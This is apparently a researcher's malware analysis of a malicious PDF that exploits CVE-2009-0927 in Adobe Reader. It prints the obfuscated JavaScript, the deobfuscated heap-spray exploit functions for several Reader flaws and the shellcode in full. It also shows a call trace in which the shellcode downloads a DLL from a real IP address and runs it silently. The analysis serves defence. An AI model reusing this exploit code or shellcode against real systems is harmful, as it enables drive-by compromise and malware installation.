#Malware Anlsys PDF/CVE-2009-0927/Adobe getIcon Exploit Pack

1. Virus Total report is:
2. https://www.virustotal.com/file/16e7b2f923b0c6f4c194ae791848b70030fa2093da0ee95a3ee926abd679fb81/analysis/
3.  
4. Sample:
5. MD5: 5e77446f3a89fac8cabb49b69cb1471c
6. File size: 11.8 KB ( 12088 bytes )
7. File name: dropped.pdf
8. File type: PDF
9.  
10. This is the malware PDF file to exploit your PC's with CVE-2009-0927 (Adobe getIcon flaw), then downloading the payload and runs it as process/daemon in your PC. This Malicious PDF is used by infection components by several Exploit Pack to infect malwares like ZeuS/Caberp/Ramnit, etc. Below is the analysis in details:
11. =====================
12. Found Here:
13. =====================
14. [code] --00:40:54-- hxxp://91.205.74.23/content/adp1.php?f=172
15. => `adp1.php@f=172'
16. Connecting to 91.205.74.23:80... connected.
17. HTTP request sent, awaiting response... 200 OK
18. Length: 12,088 (12K) [application/pdf]
19. 100%[====================================>] 12,088 --.--K/s
20. 00:40:54 (3.52 MB/s) - `adp1.php@f=172' saved [12088/12088] [/code]
21.  
22. =====================
23. Malware PDF Structure is:
24. =====================
25. [code] %PDF-1.6
26. %粤ﾏﾓ
27. 7 0 obj
28. ＜＜/Count 1/Type/Pages/Kids「28 0 R」＞＞
29. endobj
30. 21 0 obj
31. ＜＜/Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties＜＜/D＜＜/RBGroups「」＞＞＞＞/StructTreeRoot 11 0 R/Type/Catalog＞＞
32. endobj
33. 23 0 obj
34. ＜＜/JavaScript 24 0 R/AP 8 0 R＞＞
35. endobj
36. 24 0 obj
37. ＜＜/Names「123 0 R 76 0 R」＞＞
38. endobj
39. 25 0 obj
40. ＜＜/S/JavaScript/JS 26 0 R＞＞
41. endobj
42. 26 0 obj
43. ＜＜/Length 1108/Filter「/FlateDecode」＞＞stream
44. endstream
45. endobj
46. 28 0 obj
47. ＜＜/Parent 7 0 R/Contents 60 0 R/Rotate 90/MediaBox「0 0 12 92」/Resources＜＜/XObject＜＜/Im0 69 0 R＞＞/ColorSpace＜＜/CS0 59 0 R＞＞/Font＜＜/TT0 61 0 R＞＞/Properties/ExtGState＞＞/Type/Page＞＞
48. endobj
49. 60 0 obj
50. ＜＜/Length 539/Filter/FlateDecode/Type/Contents＞＞stream
51. endstream
52. endobj
53. 76 0 obj
54. ＜＜/S/JavaScript/JS(
55. x='e';
56. arr='71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35@...........
57. ...........
58. ...........
59.  
60. 8@39@29@67@70@71@57@48@68@69@40@71@49@48@23@69@37@56@10@49@39@69@28@53@23@35@10@10@17@55@25@60@49@67@60@70@53@69@17@29@25@49@53@17@55@25@25';
61. cc={q:'b+f1k0=9-vl&WA|4 \)＜:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2＞\(I;PsM"c「/Cx」Ktmehi*Uq"'}.q;
62. q=x+'v'+'al';
63. a=\(Date+String\).substr\(2,3\);
64. aa=\(「」.unshift+「」.reverse\).substr\(2,3\);
65. if \(aa==a\){
66. t='3vtwe';
67. e=t「'substr'」;
68. w=e\(12\)「q」;
69. s=「」;
70. ar=arr.split\('@'\);
71. n=cc;
72. for\(i=0;i＜ar.length;i++\){
73. s「i」=n「ar「i」」;
74. }
75. if\(a===aa\)w\(s.join\(''\)\);
76. }
77. )＞＞
78. endobj
79. xref
80. 0 155
81. trailer
82. ＜＜/Size 155
83. /Root 21 0 R＞＞
84. xref
85. 0 0
86. trailer
87. ＜＜/Size 155/Prev 75626/XRefStm 416/Root 21 0 R＞＞
88. startxref
89. 78995
90. %%EOF [/code]
91.  
92. =====================
93. If you deobfs the JS, E v a l value came up:
94. =====================
95. [code] if (e("1"))bjsg = "
96. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
97. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
98. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
99. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
100. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
101. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
102. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
103. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
104. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
105. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
106. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
107. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
108. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
109. %u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731
110. %u2632%u3d65%u0033%u0000";
111. function ezvr(ra, qy){
112. while (ra.length * 2 ＜ qy){
113. ra += ra;
114. }
115. ra = ra.substring(0, qy
116. /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
117. payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
118. scape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
119. for (var count = 0; count ＜ count2; count ++ ){
120. dkg「count」 = yarsp + payload;
121. }
122. var overflow = unescape("%u0c0c%u0c0c");
123. while (overflow.length ＜ 44952){
124. overflow += overflow;
125. }
126. this .collabStore = Collab.collectEmailInfo({
127. subj : "", msg : overflow
128. }
129. );
130. }
131. function printf(){
132. nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
133. var payload = unescape(bjsg);
134. heapblock = nop + payload;
135. bigblock = unescape("%u0A0A%u0A0A");
136. headersize = 20;
137. spray = headersize + heapblock.length;
138. while (bigblock.length ＜ spray){
139. bigblock += bigblock;
140. }
141. fillblock = bigblock.substring(0, spray);
142. block = bigblock.substring(0, bigblock.length - spray);
143. while (block.length + spray ＜ 0x40000){
144. block = block + block + fillblock;
145. }
146. mem = new Array();
147. for (i = 0; i ＜ 1400; i ++ ){
148. mem「i」 = block + heapblock;
149. }
150. var num =
151. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
152. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
153. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
154. 88888888888888888888888888;
155. util.printf("%45000f", num);
156. }
157. function geticon(){
158. var arry = new Array();
159. if (app.doc.Collab.getIcon){
160. var payload = unescape(bjsg);
161. var hWq500CN = payload.length * 2;
162. var qy = 0x400000 - (hWq500CN + 0x38);
163. var yarsp = unescape("%u9090%u9090");
164. yarsp = ezvr(yarsp, qy);
165. var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
166. for (var vqcQD96y = 0; vqcQD96y ＜ p5AjK65f; vqcQD96y ++ ){
167. arry「vqcQD96y」 = yarsp + payload;
168. }
169. var tUMhNbGw = unescape("%09");
170. while (tUMhNbGw.length ＜ 0x4000){
171. tUMhNbGw += tUMhNbGw;
172. }
173. tUMhNbGw = "N." + tUMhNbGw;
174. app.doc.Collab.getIcon(tUMhNbGw);
175. }
176. }
177. aPlugins = app.plugIns;
178. var sv = parseInt(app.viewerVersion.toString().charAt(0));
179. for (var i = 0; i ＜ aPlugins.length; i ++ ){
180. if (aPlugins「i」.name == "EScript"){
181. var lv = aPlugins「i」.version;
182. }
183. }
184. if ((lv == 9) || ((sv == 8) && (lv ＜= 8.12))){
185. geticon();
186. }
187. else if (lv == 7.1){
188. printf();
189. }
190. else if (((sv == 6) || (sv == 7)) && (lv ＜ 7.11)){
191. bx();
192. }
193. else if ((lv ＞= 9.1) || (lv ＜= 9.2) || (lv ＞= 8.13) || (lv ＜= 8.17)){
194. function a(){
195. util.printd("p@111111111111111111111111 : yyyy111", new Date());
196. }
197. var h = app.plugIns;
198. for (var f = 0; f ＜ h.length; f ++ ){
199. if (h「f」.name == "EScript"){
200. var i = h「f」.version;
201. }
202. }
203. if ((i ＞ 8.12) && (i ＜ 8.2)){
204. c = new Array();
205. var d = unescape("%u9090%u9090");
206. var e = unescape(bjsg);
207. while (d.length ＜= 0x8000){
208. d += d;
209. }
210. d = d.substr(0, 0x8000 - e.length);
211. for (f = 0; f ＜ 2900; f ++ ){
212. c「f」 = d + e;
213. }
214. a();
215. a();
216. try {
217. this .media.newPlayer(null);
218. }
219. catch (e){
220. }
221. a();
222. }
223. }[/code]
224.  
225. =====================
226. Exploits found to execute malware downloads:
227. =====================
228. [code] CVE: CVE-2009-0927
229. Desc: Adobe getIcon
230. Expl: Stack-based buffer overflow in Adobe Reader and Acrobat
231. via the getIcon method of a Collab object [/code]
232.  
233. =====================
234. Exploit Code:
235. =====================
236. [code] 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
237. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
238. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
239. ...MORE 16,288 BYTES...
240. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
241. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
242. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
243. 09 09 [/code]
244.  
245. =====================
246. Shellcode:
247. =====================
248. [code] 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
249. 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
250. 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
251. 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
252. 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
253. 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
254. 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
255. 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
256. 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
257. 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
258. 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
259. 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
260. 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
261. 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
262. eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
263. 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
264. 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
265. 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
266. 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
267. 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
268. 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
269. c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
270. 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
271. 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
272. 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 39 31 2e
273. 32 30 35 2e 37 34 2e 32 33 2f 77 2e 70 68 70 3f
274. 66 3d 31 37 32 26 65 3d 33 00 00 00 [/code]
275. =====================
276. Shellcode execution commands(uses: kernel32.DLL & urlmon.DLL)
277. =====================
278. [code] 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
279. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
280. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
281. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://91.205.74.23/w.php?f=172&e=3, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
282. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
283. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
284. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) [/code]
285. =====================
286. Shellcode Meanings:
287. =====================
288. [code] Preps env to exec command, call urlmon libs to download hxxp://91.205.74.23/w.php?f=172&e=3
289. then save it at C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll and then execute it SILENTLY w/ WinEXEC &
290. also register it ro runs as process/daemon w/ registry command. and then exit. [/code]
291.  
292. ------
293. ZeroDay Japan http://0day.jp
294. OPERATION CLEANUP JAPAN | #OCJP
295. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
296. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com